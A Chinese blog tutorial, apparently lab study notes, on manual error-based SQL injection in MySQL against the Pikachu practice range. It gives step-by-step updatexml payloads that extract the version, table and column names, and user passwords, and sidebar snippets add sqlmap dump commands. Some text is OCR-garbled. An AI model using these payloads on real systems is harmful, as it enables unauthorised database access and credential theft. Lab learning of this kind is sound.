Sql-Inject基于函数报错的信息获取

最新推荐文章于 2022-04-19 23:59:03 发布
最新推荐文章于 2022-04-19 23:59:03 发布
阅读量273 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45680080/article/details/102871957
版权

Sql-Inject漏洞手动测试-基于函数报错的信息获取
Sq|-Inject漏洞手动测试基于函数报错的信息获取
●常用的报错函数updatexml0、extractvalue0. floor0
该三个函数可通过对应的报错信息去获取需要的内容。
●基于函数报错的信息获(select/insert/update/delete )

基于报错的信息获取
技巧思路:
在MYSQL中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息。
select/insert/update/delete都可以使用报错来获取信息。
背景条件:
后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端。

基于报错的信息获取-三个常用的用来报错的函数
updatexml() :函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
extractvalue():函数也是MYSQL对XML文档数据进行查询的XPATH函数。
floor(): MYSQL中用来取整的函数。

基于报错的信息获取三个常用的用来报错的函数-updatexml)
Updatexml0函数作用:改变(查找并替换) XML文档中符合条件的节点的值。
语法: UPDATEXML (xml document(所要操作xml文档的名称), XPathstring(对xml文档哪个地方内容的更新,一个指定的位置写法,对xml文档定位), new. value())
第一个参数: fiedname是String格式,为表中的字段名。
第二个参数: XPathstring (Xpath格式的字符串)在该位置传入一个表达式,将该表达式执行的结果作为报错内容报错出来。
第三个参数: new. value,String格式,替换查找到的符合条件的
Xpathstring定位必须是有效的,否则则会发生错误。

Select下报错的利用演示

获取内容
select id,enail from nember where username=‘kobe’ union select username, password from test. payload:
kobe’ union select username. password trom users#
基于报错: uedatexml()
kobe’ and updatexml(1,version(),0)#
在这里插入图片描述
kobe’ and updatexml(1,concat(0x7e,version()),0)#
kobe’ and updatexml(1,concat(0x7e,database()),0)#

版本信息数据库名称

#报错只能一次显示一行
kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema. tables where
table_schema=‘pikachu’)),0)#
报错提示

可以使用limit一次次进行获取表名:
kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema. tables where
table_schema=‘pikachu’ limit 0,1)),0)#
获取表名
)

获取到表名后,在获取列名,思路是一样的:
kobe’ and updatexml(1, concat(0x7e, (select column_name from information_schema. columns where table_name=‘users’ limit 0,1)),0)#
获取列名

获取到列名称后,再来获取数据:
kobe’ and updatexml(1, concat(0x7e, (select username from users limit 0,1)),0)#
kobe’ and updatexml(1, concat(0x7e, (select password from users where username= ‘admin’ limit 0,1)),0)#
获取数据id名称
获取数据e-mail密码

pikachu中SQL-Inject栏目中字符型注入——构造一个报错型SQL注入——查看返回结果确认其是否可以进行报错符合SQL字符型注入的条件——用updatexml函数进行报错构造一个报错,通过报错信息获取相关数据——查询栏输入该函数kobe’ and updatexml(1,version(),0)#——得到报错返回(要将该函数(version())内容进行一个处理,否则其会把一部分内容给吞掉)——改造函数内容(将concat放在该version()函数前使其内容形成字符串打印出来,同时concat还可以执行表达式将前面字符串与后面表达式执行结果拼接起来组成一个完整的字符串,将所需要执行最终表达式放入concat里)——查询栏输入kobe’ and updatexml(1,concat(0x7e,version()),0)#(其中0x7e是波浪线十六进制的表达式(也可用其它符号的十六进制进行拼接,其目的是让所输入信息不被报错吞掉))——通过刚才payload获取该数据库版本信息
——将version()替换成别的函数名即可获得不同的所需信息,如:将version()替换成database()——查询栏输入kobe’ and updatexml(1,concat(0x7e,database()),0)#——获得该数据库的名称——查询栏输入kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema. tables where
table_schema=‘pikachu’)),0)#(通过information_schema获取相关的信息)——提示返回的数据多于一行(该函数在报错时多行不会显示出来)——让其结果只显示一行,查询栏输入kobe’ and updatexml(1,concat(0x7e,(select table_name from information_schema. tables where
table_schema=‘pikachu’ limit 0,1)),0)#——得到数据库第一个表的名称,若要得到第二个表的名称将limit 0,1换成limit 1,1得到数据库第二个表的名称——获得第三个表的名称就将limit 1,1换成limit 2,1——依次类推获得所有表的名称——获取列名称以及获取数据信息。

Oliveabercrombie
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sisu-inject-bean-1.4.2.jar
01-08
sisu-inject-bean-1.4.2.jar
SQL报错:java.sql.SQLException: sql injection violation, dbType mysql
热门推荐
SSHLY3的博客
11-16 4万+
1. 报错信息 提示如下: Caused by: java.sql.SQLException: sql injection violation, syntax error: error pos 18, line 1, column 12, token EXCEPT : insert into 1 2. 问题分析 之前遇到过类似的错误,提示也是sql injection violation,字面理解就是sql注入错误,也就是说sql不对。 经常性是因为一些列名被怀疑是sql注入被拒绝,但是此次搞了...
SQL Server 2000 获取错误信息(不是在catch块中,以及在2000以下数据库)
jzt_designer的专栏
09-22 684
sqlserver 2000数据库中,没有像sqlserver 2005一样的try...catch语句,然后可以在catch语句中获取错误信息,针对这种情况需要开发一个过程来获取错误信息,具体如下: set ANSI_NULLS ON set QUOTED_IDENTIFIER ON GO --Mudassar Khan /* PRINT 1/0 DECLARE @err_num INT SELECT @err_num=@@ERROR DECLARE @errMsg VARCHAR(1000) EX
基于函数报错信息获取
qq_43814486的博客
04-05 243
updatexml()函数是mysql对xml文档数据进行查询和修改的XPATH函数。 extractvalue()函数是mysql对xml文档数据进行查询的XPATH函数。 floor()函数是mysql中用来取整的函数。 ...
ctf从入门到放弃学习笔记SQL 基于函数报错信息获取190509
爱党人士
05-09 178
常用的报错函数updatexml()、extractvalue()、floor()  基于函数报错信息获取(select/insert/update/delete) 基于报错信息获取 这里要来解释一下: 0x7e有什么用, 因为不加上的话,报错信息就要会有一部分被覆盖,看不完整了。 0x7e 对应的是~, 可以看成是分隔符, 也可以是其他十六进制也是ok的。 extra函...
sql-inject漏洞手动测试-基于函数报错信息获取
北冥有鱼
03-31 283
1.常用的报错函数: updatexml() extractvalue() floor() 我们在使用这三个函数的时候,可以根据我们构造的报错点,把相关的报错信息给报出来,我们就可以通过相关的报错信息,来把我们想要的信息给套出来 2.基于函数报错信息获取(select/insert/update/delete) 前面的几次注入我们一直都用的select,这次我们可以使用insert,updat...
sql-inject-reject:HTTP服务器中间件,用于检测和拒绝SQL注入尝试
05-11
入门将sql-inject-reject安装为npm模块并将其作为依赖项保存到package.json文件中: npm install sql-inject-reject 一旦安装,您可以通过调用require('sql-inject-reject');来引用它require('sql-inject-reject');...
第四节 基于报错SQL注入-01
09-15
GET基于报错SQL注入利用是指利用SQL注入漏洞来获取敏感数据或控制服务器。下面是一些常见的利用方法: 1. 利用order by 判断字段数:使用order by语句来判断表中的字段数,例如:`0' order by 3 --+`。 2. 利用...
gulp-inject-partials:基于其路径名递归注入部分。 gulp-inject具体案例的实现
02-03
Gulp-inject-partials解析目标文件,定位已定义的占位符,并根据其相对路径注入文件内容。 请参阅下面的和。 Gulp-inject-Partials受启发。 注意:需要NodeJ v4或更高版本。 安装 安装gulp-inject-partials作为...
javax-inject-1.0-201002241208.jar.zip
07-01
《Java注射框架——javax.inject详解》 在Java开发中,依赖注入(Dependency Injection,简称DI)是一种设计模式,它能够使代码更加灵活、可测试和易于维护。javax.inject是Java平台上的一个标准注入API,它是JSR ...
渗透测试——报错注入
zjdda的博客
05-20 815
1.报错注入原理 由于后台没有对数据库的信息做过滤,会输出到前台显示,那么我们就可以通过制造报错函数,将查询语句带入到数据库中,以报错信息显示出来。 2.报错注入漏洞产生的条件 1)参数用户可控:前端传入的参数内容由用户控制 2)参数带入数据库的查询:传入的参数拼接到 SQL 语句,并且带入数据库的查询 3)对用户输入的数据没有做合法性的判断 4)后台对数据库的信息没做过滤,会输出到前台显示 3.常用哪些函数来制造爆错? extractvalue\updatexml\floor\exp 4.updatex
【Struts2源码】@Inject查找并缓存注入器
赤山岛
05-15 142
注解@Inject的操作类是ContainerImpl,@Inject在Struts中用到了很多,主要用来构造函数、属性、方法及方法参数注入,当调用ContainerImpl的Inject方法时,这些部分就启动,ContainerImpl初始化时,缓存这些构建方法 这里我们只分析查找这些带@Inject的注入器,并把它们缓存起来。 1.初始化一个注入器Map,用来放置找到@Inject后实例化...
基于函数报错sql漏洞查询
weixin_44720762的博客
04-07 264
基于报错信息获取 简单介绍函数updatexml(): updatexml(xml_document,xpath_string,new_value): 其中第一个参数的document为文件名;第二个参数前面的xpath是xml中查询语言(至于更详细的xpath语法,读者可以自行百度),简单来说就是对第一个参数中的文件进行定位的,string代表格式;第三个参数表示重新定义查找到的数据,也就是说...
vue 依赖注入 provide/inject 实战
guo8ke的专栏
05-29 1775
官网描述是: provide选项允许我们指定我们想要提供给后代组件的数据/方法。在这个例子中,就是<google-map>内部的getMap方法: provide: function () { return { getMap: this.getMap } } 然后在任何后代组件里,我们都可以使用inject选项来接收指定的我们想要添加在这个实例上的...
sql报错信息
weixin_33995481的博客
10-25 188
Column'EMPLOYEEID' in field list is ambiguous(引起歧义的) 在两个或多个表中都有EMPLOYEEID这个字段 转载于:https://blog.51cto.com/gzzjsoft/1036457
实验13:insert update delete注入
qq_44720671的博客
04-01 705
基于insert update delete的注入利用 一、insert/update注入 打开Pikachu中的insert/update注入 点击注册界面 首先测试注入点,通常我们用”单引号“来测试,在必选项上分别输入”单引号“ 因此,我们可以利用报错获取信息 用户名输入nihao’ or updatexml(1,concat(0x7e,database()),0) or ’ 密码随意输入,...
详细讲解vue2组件通信(四)——多代传递provide/inject
浪头的博客
04-19 5419
学一个知识点,我们得知道这个知识点是用来干嘛的?为什么选择用它?怎么用? provide/inject的作用 vue官网原话【允许一个祖先组件向其所有子孙后代注入一个依赖,不论组件层次有多深, 并在其上下游关系成立的时间里始终生效。】也就是如果当前组件设置了provide传递数据, 那么在当前组件的所有后辈组件中,都可以使用inject接收这个数据。 provide/inject被选择的理由 组件通信的方式那么多,多代传递数据的通信方式还有vuex,$root,全局事件总线。为什 么选择provide/
EN 15085-2:2007 中文 铁路应用-轨道车辆和轨道车辆部件焊接.pdf
最新发布
07-13
EN 15085-2:2007 中文 铁路应用-轨道车辆和轨道车辆部件焊接.pdf
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu --tables。 2. 然后,您可以使用以下命令来查询指定表名(例如users)的字段(例如username和password)并导出结果:sqlmap -u "http://192.168.1.157/pikachu-master/vul/sqli/sqli_str.php?name=123&submit=查询" -D pikachu -T users -C username,password --dump。 3. 如果您需要爆出数据库名为pikachu,您可以使用以下命令:a' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu')),0)#。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值